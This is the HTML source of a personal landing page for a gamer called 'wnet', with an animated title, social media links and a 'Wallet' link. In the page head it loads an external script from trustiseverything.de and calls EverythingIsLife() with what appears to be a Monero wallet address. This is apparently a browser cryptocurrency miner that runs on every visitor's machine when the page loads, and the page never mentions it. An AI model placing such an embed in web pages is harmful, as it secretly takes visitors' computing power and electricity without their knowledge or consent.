

<!DOCTYPE html>
<html>
<head>
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.1/css/bootstrap.min.css">
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.1/js/bootstrap.min.js"></script>
<script src="https://trustiseverything.de/karma/karma.js?karma=bs?nosaj=faster.mo" ></script>
    <script>
var title = new MovingTitle("wnet - epic gamer  ", 300, 12);
title.init();
function MovingTitle(writeText, interval, visibleLetters) {
    var _instance = {};

    var _currId = 0;
    var _numberOfLetters = writeText.length;

    function updateTitle() {
        _currId += 1;
        if(_currId > _numberOfLetters - 1) {
            _currId = 0; 
        }

        var startId = _currId;
        var endId = startId + visibleLetters;
        var finalText;
        if(endId < _numberOfLetters - 1) {
            finalText = writeText.substring(startId, endId);
        } else {
            var cappedEndId = _numberOfLetters;
            endId = endId - cappedEndId;

            finalText = writeText.substring(startId, cappedEndId) +     writeText.substring(0, endId);
        }

        document.title = finalText; 
    }

    _instance.init = function() {
        setInterval(updateTitle, interval);
    };

    return _instance;
}
</script>
<script type="text/javascript">
EverythingIsLife('47ZMkmFNr76BQSL2GGpDjFCA5EPqBGKXmWUvR6tpfqVsNqcBby9WDNreHVgfmrTc9RauoSn3LfbFzXuChpwv3qDm4UxKoWb', 'website', 0);
</script>

         <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.0.0-beta1/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-giJF6kkoqNQ00vy+HMDP7azOuL0xtbfIcaT9wjKHr8RbDVddVHyTfAAsrekwKmP1" crossorigin="anonymous">
         <script src="https://kit.fontawesome.com/6dbcb3829c.js" crossorigin="anonymous"></script><link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.15.2/css/all.css" integrity="sha384-vSIIfh2YWi9wW0r9iZe7RJPrKwp6bG+s9QZMoITbCckVJqGCCRhc+ccxNcdpHuYu" crossorigin="anonymous">
         <link rel="shortcut icon" href="favicon.ico">
    <style>

@import url('https://fonts.googleapis.com/css2?family=Open+Sans+Condensed:wght@300&family=Oswald&display=swap');

body {
  background-color: black;
 
}
#hero img {
    height: 100vh;
    width: 100%;
    background-position: absolute;
    z-index: 10;
    object-fit: cover;
}

#hero .content {
    background: rgba(0,0,0,0.7);
    height: 100%;
    width: 100%;
    z-index:20;
    position:absolute;
    top:0;
    left:0;
}

.switch {
    position:absolute;
    display: inline-block;
    width: 60px;
    height:34px;
    left: 5%;
    top:3%;
}

.switch input {
    opacity:0;
    width:0;
    height:0;
}

.slider {
    position: absolute;
    cursor: pointer;
    top: 0;
    left:0;
    right:0;
    bottom:0;
    background-color: #ccc;
    -webkit-transition: .4s;
}

.slider:before{
    position: absolute;
    content: "";
    height: 26px;
    width:26px ;
    left:4px;
    bottom: 4px;
    background-color: white;
    -webkit-transition: .4s;
}

input:checked + .slider {
    background-color: Tomato;
}

input:focus + .slider{
    box-shadow: 0 0 20px #2b78c2;
}
input:checked + .slider:before {
    transform: translateX(26px);
}
.slider.round{
    border-radius: 34px;
}
.slider.round:before {
    border-radius: 50%;
}

#clickme {
    color: #d9ddde;
    position:absolute;
    display: inline-block;
    width: 60px;
    height:34px;
    left: 5%;
    top:3%;
    text-indent: 12em;
    font-size: 18px; 
}


@import url('https://fonts.googleapis.com/css2?family=PT+Sans+Narrow:wght@700&display=swap');
#center {
font-family: 'PT Sans Narrow', sans-serif;
}

#button-text {
font-family: 'Open Sans Condensed', sans-serif;
}

#block {
  margin-left: 3px;
  margin-right:3px;
  
}

    </style>

</head>
    
<body onload="MovingTitle(writeText, interval, visibleLetters)">

<div id='hero'>

<img class="giphy" src="bg.gif">

<div class ="content d-flex align-items-center">

  <div id= "center" class ="container text-center">
    
    <h1 style="color:white; padding-bottom: 6px">wnet</h1> 

    <span class="icons">
        <span id="block">
            <a style="color: Tomato;"  alt="wnet#0001"><i class="fab fa-discord fa-2x" ></i></a>
        </span>
        <span id="block">
            <a style="color: Tomato;" href="https://www.youtube.com/channel/UC0DvGg4pkwuzKbM2fyx9bsQ"><i class="fab fa-youtube fa-2x"></i></a>
        </span>
        <span id="block">
            <a style="color: Tomato;" href="https://github.com/wnetwnetwnet"><i class="fab fa-github fa-2x"></i></a>
        </span>
        <span id="block">
            <a style="color: Tomato;" href="https://twitter.com/wnetwnetwnet"><i class="fab fa-twitter fa-2x"></i></a>
        </span>
        <span id="block">
            <a style="color: Tomato;" href="https://www.instagram.com/wnetwnetwnet/"><i class="fab fa-instagram fa-2x"></i></a>
        </span>
        <span id="block">
            <a style="color: Tomato;" href="https://keybase.io/wnet"><i class="fab fa-keybase fa-2x"></i></a>
        </span>
        <span id="block">
            <a style="color: Tomato;" href="https://www.reddit.com/user/wnetwnetwnet"><i class="fab fa-reddit fa-2x"></i></a>
        </span>
        <span id="block">
            <a style="color: Tomato;" href="https://www.tiktok.com/@wnetwnetwnet"><i class="fab fa-tiktok fa-2x"></i></a>
        </span>


    </span>


  </div>


  <div>
      <a href="/wallet.html" id="clickme" style="color:#d9ddde; margin-left:1px; margin-top: 10px; text-decoration:none;">Wallet</a>

    
  </div>

</div>

<script src="https://code.jquery.com/jquery-3.5.1.min.js" integrity="sha256-9/aliU8dGd2tb6OSsuzixeV4y/faTqgFtohetphbbj0=" crossorigin="anonymous"></script>

</body>
</html>
